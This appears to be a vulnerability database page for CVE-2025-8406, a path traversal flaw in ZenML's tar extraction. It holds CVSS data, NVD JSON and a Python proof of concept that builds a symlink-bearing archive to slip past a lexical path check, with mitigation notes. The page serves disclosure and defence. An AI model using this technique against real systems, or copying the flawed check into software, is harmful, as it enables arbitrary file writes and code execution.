Security Vulnerability Report
CVE-2025-8406 CVSS 7.8 HIGH

CVE-2025-8406

Published: 2025-10-05 09:15:32
Last Modified: 2025-10-30 14:08:25

Description

ZenML version 0.83.1 is affected by a path traversal vulnerability in the `PathMaterializer` class. The `load` function uses `is_path_within_directory` to validate files during `data.tar.gz` extraction, which fails to effectively detect symbolic and hard links. This vulnerability can lead to arbitrary file writes, potentially resulting in arbitrary command execution if critical files are overwritten.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:* - VULNERABLE
ZenML >= 0.83.1 and < 0.84.2 (per the NVD configuration data below: versionStartIncluding 0.83.1, versionEndExcluding 0.84.2; 具体修复版本请参考官方 commit 5d22a48d7bf6c7f10b748577c2be79cc7969d398)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-8406 - ZenML PathMaterializer Path Traversal PoC
Vulnerability: Path traversal via symbolic/hard links in data.tar.gz extraction

As written, the script builds a tar.gz containing a symlink member
(``evil_link`` -> ``target_file``) and a regular file member (``payload.txt``),
then extracts both under a temporary directory through a re-implementation of
the weak containment check. The check only inspects the lexical path of each
member *name* and never looks at ``member.linkname``, which is why the symlink
member is not rejected. Extraction performs real filesystem operations: the
archive and the extracted members land in the temporary directory, and the
created symlink points at ``target_file`` (default ``/tmp/cve_2025_8406_pwned``).
"""
import tarfile
import os
import io
import tempfile


def create_malicious_tar(output_path: str, target_file: str) -> None:
    """
    Create a malicious tar.gz file that exploits the path traversal
    vulnerability by using a symbolic link to point outside the intended directory.

    Args:
        output_path: Filesystem path the ``.tar.gz`` archive is written to.
        target_file: Link target recorded verbatim in the symlink member's
            ``linkname`` (an absolute path stays absolute in the archive).

    The archive holds two members, in this order: a symlink
    (``tarfile.SYMTYPE``) named ``evil_link`` whose ``linkname`` is
    ``target_file``, and a small regular file named ``payload.txt``.
    """
    with tarfile.open(output_path, "w:gz") as tar:
        # Add a symbolic link pointing to a sensitive file location
        symlink_name = "evil_link"
        info = tarfile.TarInfo(name=symlink_name)
        info.type = tarfile.SYMTYPE
        info.linkname = target_file
        tar.addfile(info)
        # Add a small regular file member
        payload_content = b"malicious payload content\n"
        payload_info = tarfile.TarInfo(name="payload.txt")
        payload_info.size = len(payload_content)
        tar.addfile(payload_info, io.BytesIO(payload_content))


def exploit_via_symlink(target_file: str = "/tmp/cve_2025_8406_pwned") -> None:
    """
    Main exploit function demonstrating CVE-2025-8406.
    Creates a malicious archive and simulates the vulnerable extraction process.

    Args:
        target_file: Path the archive's symlink member points at; it is also
            the path tested with ``os.path.exists`` after extraction.

    Returns:
        None. Progress is reported on stdout with ``[BLOCKED]``,
        ``[EXTRACTING]``, ``[SUCCESS]`` and ``[CONTENT]`` lines.
    """
    # Create temporary directory for extraction
    with tempfile.TemporaryDirectory() as extract_dir:
        # Generate malicious tar.gz
        malicious_tar = os.path.join(extract_dir, "data.tar.gz")
        create_malicious_tar(malicious_tar, target_file)
        # Simulate ZenML's PathMaterializer.load() behavior
        # The vulnerable is_path_within_directory fails to detect symlinks
        with tarfile.open(malicious_tar, "r:gz") as tar:
            for member in tar.getmembers():
                # Vulnerable check: doesn't properly handle symlinks
                # Only extract_dir joined with the member *name* is checked;
                # member.linkname is never passed in, so a link whose name sits
                # under extract_dir passes no matter where it points.
                if not is_path_within_directory_vulnerable(
                    os.path.join(extract_dir, member.name), extract_dir
                ):
                    print(f"[BLOCKED] {member.name}")
                    continue
                print(f"[EXTRACTING] {member.name} -> {member.linkname if member.issym() else 'file'}")
                # Mitigation note: on Python 3.12+ tarfile extraction accepts
                # filter="data" (PEP 706), which raises tarfile.FilterError for
                # link members pointing to absolute paths or outside the
                # destination; that filter becomes the default in 3.14. A fixed
                # containment check should also resolve both sides with
                # os.path.realpath() before comparing, and validate linkname
                # for link members separately.
                tar.extract(member, extract_dir)
        # Verify exploitation
        # os.path.exists() follows symlinks and is also true for a file that
        # already existed before the run, so this line alone does not prove
        # that extraction wrote the file.
        if os.path.exists(target_file):
            print(f"[SUCCESS] File written to: {target_file}")
            with open(target_file, 'r') as f:
                print(f"[CONTENT] {f.read()}")


def is_path_within_directory_vulnerable(path: str, directory: str) -> bool:
    """
    Simulates the vulnerable is_path_within_directory function.
    It does NOT resolve symbolic links, allowing traversal.

    Args:
        path: Candidate path (here ``extract_dir`` joined with a member name).
        directory: Directory the candidate must stay inside.

    Returns:
        True when the normalised absolute form of ``path`` equals
        ``directory`` or starts with ``directory`` followed by ``os.sep``.

    os.path.abspath() only normalises the string and does not consult the
    filesystem, so a symlink whose *name* lies inside ``directory`` is
    accepted even though its target lies elsewhere. A hardened variant
    resolves both arguments with os.path.realpath() and compares with
    os.path.commonpath(); for archive members that are links, the linkname
    still has to be validated on its own, because the link itself is created
    inside ``directory``.
    """
    abs_path = os.path.abspath(path)
    abs_directory = os.path.abspath(directory)
    # Bug: doesn't use os.path.realpath() to resolve symlinks
    return abs_path.startswith(abs_directory + os.sep) or abs_path == abs_directory


if __name__ == "__main__":
    # Entry point: print a banner, then run the demonstration against the
    # default target_file.
    print("[*] CVE-2025-8406 PoC - ZenML PathMaterializer Path Traversal")
    print("[*] Creating malicious archive with symbolic link bypass...\n")
    exploit_via_symlink()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8406", "sourceIdentifier": "[email protected]", "published": "2025-10-05T09:15:31.767", "lastModified": "2025-10-30T14:08:25.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZenML version 0.83.1 is affected by a path traversal vulnerability in the `PathMaterializer` class. The `load` function uses `is_path_within_directory` to validate files during `data.tar.gz` extraction, which fails to effectively detect symbolic and hard links. This vulnerability can lead to arbitrary file writes, potentially resulting in arbitrary command execution if critical files are overwritten."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zenml:zenml:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.83.1", "versionEndExcluding": "0.84.2", "matchCriteriaId": 
"1B8F20EE-6A5B-4B25-BCC7-2E818C5BB8F1"}]}]}], "references": [{"url": "https://github.com/zenml-io/zenml/commit/5d22a48d7bf6c7f10b748577c2be79cc7969d398", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://huntr.com/bounties/a0880d64-9928-45bf-9663-2cd81582d9e7", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://huntr.com/bounties/a0880d64-9928-45bf-9663-2cd81582d9e7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}